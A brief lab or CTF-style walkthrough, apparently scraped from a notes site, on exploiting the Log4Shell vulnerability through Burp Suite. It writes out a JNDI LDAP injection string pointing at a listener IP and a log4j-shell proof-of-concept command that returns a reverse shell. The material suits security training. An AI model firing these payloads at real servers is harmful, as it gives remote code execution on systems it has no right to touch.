Check this articlearrow-up-right for more info To check for Log4Shell exploit :
${jndi:ldap://10.8.0.178:4444/a}
Then url encode it and send through burp after intercepting:
Listening on nc:
We get some weird characters back.
Then we can use a log4j-shellarrow-up-right Download javaarrow-up-right and execute
Then send the payload:
Sending the url encoded payload in burpsuite.
Now we get a shell back:
Last updated 1 year ago
python3 poc.py --userip 10.8.1.208 --webport 8000 --lport 9001
